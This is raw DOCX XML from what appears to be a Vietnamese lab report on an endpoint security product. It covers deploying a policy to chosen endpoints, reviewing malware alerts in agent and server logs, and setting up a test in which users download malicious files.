      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D74A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EA990DD" wp14:editId="5658DD37">
            <wp:extent cx="5943600" cy="2832735"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="337974113" name="Picture 33797411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4113"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5943600" cy="2832735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="048F38AB" w14:textId="66F080EB" w:rsidR="0001348C" w:rsidRPr="005F62F4" w:rsidRDefault="00914BEE" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo click vào </w:t>
      </w:r>
      <w:r w:rsidR="00CA73EC" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Targets -&gt; Manage </w:t>
      </w:r>
      <w:r w:rsidR="00964D70" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>targets</w:t>
      </w:r>
      <w:r w:rsidR="00AF71E2" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chọn Endpoint </w:t>
      </w:r>
      <w:r w:rsidR="000D7BF6" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>để deploy policy này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CB881" w14:textId="0A8D624A" w:rsidR="00B82BAB" w:rsidRPr="005F62F4" w:rsidRDefault="00B82BAB" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ta có thể chọn endpoint theo Host name, IP address và hệ điều hành</w:t>
      </w:r>
      <w:r w:rsidR="00B470D8" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBAAE7" w14:textId="6EDAADCA" w:rsidR="0025668D" w:rsidRPr="005F62F4" w:rsidRDefault="0025668D" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D74A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05DA64D4" wp14:editId="0A799C01">
            <wp:extent cx="5943600" cy="1682115"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="13335"/>
            <wp:docPr id="1338235189" name="Picture 1338235189"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5189" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, hàng, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1682115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CDD41E" w14:textId="2F723057" w:rsidR="0025668D" w:rsidRPr="005F62F4" w:rsidRDefault="0025668D" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sau khi</w:t>
      </w:r>
      <w:r w:rsidR="00B470D8" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> chọn được Endpoint mong muốn </w:t>
      </w:r>
      <w:r w:rsidR="003B0354" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">click vào </w:t>
      </w:r>
      <w:r w:rsidR="00114E07" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Add specific target</w:t>
      </w:r>
      <w:r w:rsidR="003B38E6" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s -&gt; Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8E816" w14:textId="059F07C2" w:rsidR="005030D2" w:rsidRPr="005F62F4" w:rsidRDefault="005030D2" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D74A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6945D674" wp14:editId="10D64B20">
            <wp:extent cx="5942330" cy="1989666"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="10795"/>
            <wp:docPr id="210641229" name="Picture 21064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50" cy="1997943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F660769" w14:textId="19B9B374" w:rsidR="005B75F7" w:rsidRPr="005F62F4" w:rsidRDefault="001764F3" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sau khi chọn targets xong cick vào deploy ở góc dưới màn hình để deploy policy</w:t>
      </w:r>
      <w:r w:rsidR="0026671A" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00213C7E" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Quá trình này tốn vài phút để deploy policy thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E28C9" w14:textId="478F55DC" w:rsidR="00213C7E" w:rsidRPr="005F62F4" w:rsidRDefault="00E64F8F" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D74A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60DDBFB9" wp14:editId="1E3FA9BA">
            <wp:extent cx="5943600" cy="899795"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="14605"/>
            <wp:docPr id="1367439677" name="Picture 1367439677"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9677" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, hàng&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="899795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77851A1F" w14:textId="14E085F2" w:rsidR="005D021A" w:rsidRPr="005F62F4" w:rsidRDefault="005D021A" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi này Endpoint sẽ alert rằng trên máy bị dính malware, ta có thể </w:t>
      </w:r>
      <w:r w:rsidR="004E6549" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="0080112B" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">trên </w:t>
      </w:r>
      <w:r w:rsidR="001D1B92" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>log của phần mềm Agent tại máy End</w:t>
      </w:r>
      <w:r w:rsidR="00643010" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>point hoặc log của server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7854ACD1" w14:textId="6376D16C" w:rsidR="00643010" w:rsidRPr="005F62F4" w:rsidRDefault="00643010" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D74A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604D140B" wp14:editId="2B3F73E7">
            <wp:extent cx="5935980" cy="3162300"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="19050"/>
            <wp:docPr id="549519095" name="Picture 5495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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BE1F3" w14:textId="55DBF895" w:rsidR="00F038DE" w:rsidRPr="005F62F4" w:rsidRDefault="00F038DE" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Log từ app security agent trên Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19841912" w14:textId="77777777" w:rsidR="00F038DE" w:rsidRDefault="00F038DE" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710CC211" w14:textId="117E06AE" w:rsidR="00F038DE" w:rsidRPr="005F62F4" w:rsidRDefault="00F038DE" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AD30878" wp14:editId="1331A043">
            <wp:extent cx="5943600" cy="2796540"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="22860"/>
            <wp:docPr id="518811051" name="Picture 51881105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1051" name="Hình ảnh 9" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, phần mềm&#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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5A31B8" w14:textId="11FA560E" w:rsidR="00F038DE" w:rsidRPr="005F62F4" w:rsidRDefault="00F038DE" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Log trên server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69173594" w14:textId="0A1DA63F" w:rsidR="00E76B78" w:rsidRPr="005F62F4" w:rsidRDefault="00E76B78" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Xem chi tiết </w:t>
      </w:r>
      <w:r w:rsidR="00F67CC6" w:rsidRPr="005F62F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>thông tin từng threat bằng cách click vào threat đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782652B4" w14:textId="23A26EC1" w:rsidR="00F67CC6" w:rsidRPr="00AC1637" w:rsidRDefault="00F67CC6" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF28B04" wp14:editId="039CD91D">
            <wp:extent cx="3352800" cy="3040380"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="508627049" name="Picture 508627049"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7049" name="Hình ảnh 7" descr="Ảnh có chứa văn bản, đồ điện tử, ảnh chụp màn hình, phần mềm&#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3040380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CFD7AD" w14:textId="0EE7A91B" w:rsidR="00FE072C" w:rsidRPr="00AC1637" w:rsidRDefault="00FE072C" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi xử lý xong, </w:t>
      </w:r>
      <w:r w:rsidR="00F92C0D" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>giao diện</w:t>
      </w:r>
      <w:r w:rsidR="00EA1C35" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> app Agent sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00793776" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trông như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006F06AF" w14:textId="51740792" w:rsidR="00C83C4E" w:rsidRPr="00C83C4E" w:rsidRDefault="00793776" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F3EB189" wp14:editId="04F1120B">
            <wp:extent cx="3726180" cy="3329940"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="22860"/>
            <wp:docPr id="865218906" name="Picture 86521890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8906" name="Hình ảnh 865218906" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Phông chữ&#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3329940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A0010" w14:textId="2CA769E0" w:rsidR="00911809" w:rsidRPr="0004418A" w:rsidRDefault="0004418A" w:rsidP="0004418A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc152795843"/>
      <w:r w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phát hiện và ngăn chặn malware – </w:t>
      </w:r>
      <w:r w:rsidR="00E3702B" w:rsidRPr="0004418A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>tấn công từ bên ngoài</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="25FAB4FC" w14:textId="0127BE4F" w:rsidR="003754E1" w:rsidRPr="00AC1637" w:rsidRDefault="003754E1" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong thử nghiệm này, ngữ cảnh của nhóm là </w:t>
      </w:r>
      <w:r w:rsidR="00727283" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>User sẽ download những file độc hại trên Internet và bị khai thác</w:t>
      </w:r>
      <w:r w:rsidR="00E21C00" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B63A3F6" w14:textId="6AF6D53C" w:rsidR="00B917F7" w:rsidRPr="00AC1637" w:rsidRDefault="00B917F7" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong thử nghiệm này, ban đầu máy Endpoint sẽ </w:t>
      </w:r>
      <w:r w:rsidR="001B1A8A" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bị tắt những tính năng bảo mật của Agent để thực hiện tấn công và sau đó bật lại những tính năng bảo mật này để kiểm tra</w:t>
      </w:r>
      <w:r w:rsidR="008641DD" w:rsidRPr="00AC1637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB7C16" w14:textId="1035D4A3" w:rsidR="000C0DC9" w:rsidRPr="00AC1637" w:rsidRDefault="000C0DC9" w:rsidP="00777654">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52C9EDCB" wp14:editId="110ECED7">
            <wp:extent cx="5692140" cy="2697480"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="26670"/>
            <wp:docPr id="1763434328" name="Picture 1763434328" descr="Ảnh có chứa văn bản, phần mềm, Biểu tượng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4328" name="Hình ảnh 2" descr="Ảnh có chứa văn bản, phần mềm, Biểu tượng máy tính, ảnh chụp màn hình&#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140" cy="2697480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
